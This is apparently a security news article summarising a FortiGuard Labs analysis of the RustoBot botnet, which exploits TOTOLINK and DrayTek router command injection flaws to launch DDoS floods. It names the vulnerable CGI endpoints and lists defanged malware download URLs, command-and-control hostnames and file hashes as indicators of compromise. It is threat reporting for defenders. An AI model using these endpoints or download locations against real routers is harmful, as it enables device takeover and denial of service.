A new malware named “RustoBot” has been discovered exploiting vulnerabilities in various router models to gain unauthorized access and initiate Distributed Denial of Service (DDoS) attacks.
This advanced cyber-threat, first observed in January to February 2025, targets TOTOLINK and DrayTek devices, showcasing sophisticated techniques unlike previously known malware.
The botnet leverages multiple command injection vulnerabilities, primarily residing in TOTOLINK’s cstecgi.cgi
script and DrayTek’s cgi-bin/mainfunction.cgi/apmcfgupload
interface.
These vulnerabilities allow attackers to run arbitrary system commands remotely.
RustoBot uses several downloader scripts utilizing common commands like wget
and tftp
to propagate itself across devices with different architectures, including arm5, arm6, arm7, mips, mpsl, and x86.
Upon infection, RustoBot employs encryption to obfuscate its configuration, using the XOR algorithm with complex calculations to retrieve keys for decoding ciphertext.
This approach helps the malware evade detection by standard security systems.
Once decoded, the configuration assists in resolving command and control (C2) server domains and executing DDoS attacks.
The malware’s entry point, identified through reverse engineering, demonstrates a high level of sophistication, using system API offsets to perform its malicious behaviors.
RustoBot supports a variety of DDoS attack methods, including Raw IP, TCP, and UDP flooding.
It receives attack parameters from the C2 server, initiating attacks based on predefined commands.
For example, the 0x03
command triggers a UDP flood attack, specifying victim IP addresses, port numbers, attack duration, and packet lengths.
This structured command system enables attackers to coordinate significant disruptions with precision.
The malware campaigns were observed in Japan, Taiwan, Vietnam, and Mexico, targeting the technology sector.
The attacks not only compromise the security of the affected devices but also pose a significant risk to the operational integrity of businesses relying on these internet gateways.
To combat this threat, FortiGuard Labs has integrated multiple protective measures into its security solutions, including:
According to the Report, Fortinet advises organizations to strengthen endpoint monitoring and authentication, alongside considering training through their Fortinet Certified Fundamentals (FCF) in Cybersecurity.
This comprehensive approach by FortiGuard Labs ensures a robust defense against the emerging threat of RustoBot, urging all stakeholders in the cybersecurity community to remain vigilant and proactive.
Type | Value |
---|---|
URL | hxxp://66[.]63[.]187[.]69/w.sh |
URL | hxxp://66[.]63[.]187[.]69/wget.sh |
URL | hxxp://66[.]63[.]187[.]69/tftp.sh |
Host | dvrhelper[.]anondns[.]net, techsupport[.]anondns[.]net, rustbot[.]anondns[.]net |
IP | 5[.]255[.]125[.]150 |
File Hash | 76a487a46cfeb94eb5a6290ceffabb923c35befe71a1a3b7b7d67341a40bc454, 75d031e8faaf3aa0e9cafd5ef0fd7de1a2a80aaa245a9e92bae6433a17f48385, … |
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…
A threat actor known as #LongNight has reportedly put up for sale remote code execution…
Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…
Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…
The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…
Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…